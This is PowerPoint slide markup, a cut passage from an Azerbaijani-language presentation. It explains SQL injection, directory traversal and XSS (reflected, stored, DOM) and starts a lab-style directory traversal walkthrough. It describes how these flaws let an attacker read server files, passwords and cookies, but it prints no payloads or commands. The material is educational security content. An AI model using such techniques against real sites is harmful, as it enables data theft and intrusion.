                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uğurlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> olduğunu digərlərinin isə fərqli nəticə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>göstərsələrdə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uğursuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> olduğunu gördük nəticədə bütün </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1980</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bant genişliyinə malik olan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kodları </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sistemin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="22242D"/>
                </a:highlight>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> açığından istifadə edərək sistemdəki bütün məlumatları qarşımıza çıxara bilər.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48734" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206501" y="0"/>
            <a:ext cx="11184810" cy="2238772"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>             Təhlükəsizlik açığı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048735" name="Mətn Qutusu 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311285" y="1974715"/>
            <a:ext cx="11439728" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu açıq shifədə bizə fayllar arasında keçiş etməyimizə imkan yaradır.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu açıq saytın düzgün bir şəkildə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kodlanmamasından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yaranan bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>açıqdı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Bu açıq saytdakı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>şəkildə,faylda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, yazı faylında (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iconda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>və.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> olan açıq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>növüdü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yolunu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>takib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> edərək bu acığı tapa bilərik .Bu açıq hər </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bir saytın serverini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>görməyimizə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> imkan yaradan bir vasitədir </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bir sözlə saytın serverini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>görüntüləyib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lazimi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> məlumatlar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>şifrələr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>və.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>göturə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bilərik.Bunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yaxşı bilmək üçün serverə tam hakim olmaq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sistem əmrlərini bilmək lazımdır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048877" name="Metin kutusu 1048876"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391311" y="5344161"/>
            <a:ext cx="4000000" cy="1513839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="96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736"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737" name="Rectangle 18"/>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38" name="Freeform: Shape 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="10825122" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10825122"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY2" fmla="*/ 264816 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 10825122 w 10825122"/>
              <a:gd name="connsiteY3" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY4" fmla="*/ 6593184 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 108251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97207" name="Şəkil 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1003" t="-174" r="189" b="51"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="577912"/>
            <a:ext cx="8818976" cy="5702173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048739"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740" name="Düzbucaqlı 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744817" y="2395330"/>
            <a:ext cx="2524540" cy="124239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48613" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235077" y="101727"/>
            <a:ext cx="7401136" cy="1955673"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Təhlükəsizlil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> açığı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048614" name="Mətn Qutusu 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165369" y="2057400"/>
            <a:ext cx="11791553" cy="3825240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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XSS Təhlükəsizlik Açığı –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Veb</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shifələrində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uzaqdan müdaxilə ilə HTML və JAVA SCRİPT kodları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ"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nın</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işlədil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>məsinə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imkan verən açıqdır .</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Bəzi Java Script kodları ilə hədəf veb saytın Cookie , İP , Sistem məlumatları</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ı ələ keçirə bilərlər.Veri girişi edilə bilinən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hər</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shifədə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bu açıq ola bilər.Üç fərqli növü var</a:t>
            </a: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REFLECTED XSS – Açığın olduğu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shifədə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müəyyən yerlərə yazılan JavaScript kodlarının işlədilməsi ilə baş verir amma bu kod işlədilərkən verilənlər bazasına qeyd edilmir yəni həmən an olduğumuz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shifədə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həmin kod işlədilə bilir.</a:t>
            </a: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STORED XSS – Bu açığın ilkindən fərqi </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kodun işlədilərkən verilənlər bazasına qeyd edil</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məsidir</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digər açığa görə daha təhlükəlidir.</a:t>
            </a:r>
            <a:b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DOM XSS – Ən Təhlükəli növ isə budur </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veb</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shifəsinə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virus və trojan kimi kodlar entegre edilə bilir və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Veb</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shifəyə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giriş etdikdə heç bir şey edilmədikdə belə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fərqli</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shifəyə</a:t>
            </a:r>
            <a:r>
              <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sizi yönləndirə bilər</a:t>
            </a:r>
            <a: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az-Latn-AZ"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və.s</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ"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az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048873" name="Metin kutusu 1048872"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4096000" y="3219450"/>
            <a:ext cx="4000000" cy="510540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="2800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048874" name="Metin kutusu 1048873"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9658149" y="0"/>
            <a:ext cx="1334031" cy="1513840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="96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08" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="45395" y="0"/>
            <a:ext cx="4559441" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097209" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604836" y="-72316"/>
            <a:ext cx="7541769" cy="5179338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048741" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45395" y="3501316"/>
            <a:ext cx="4559441" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsində</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yanındakı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>şəkilə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mausun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sağ düyməsi ilə basırıq və çıxan menyudan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
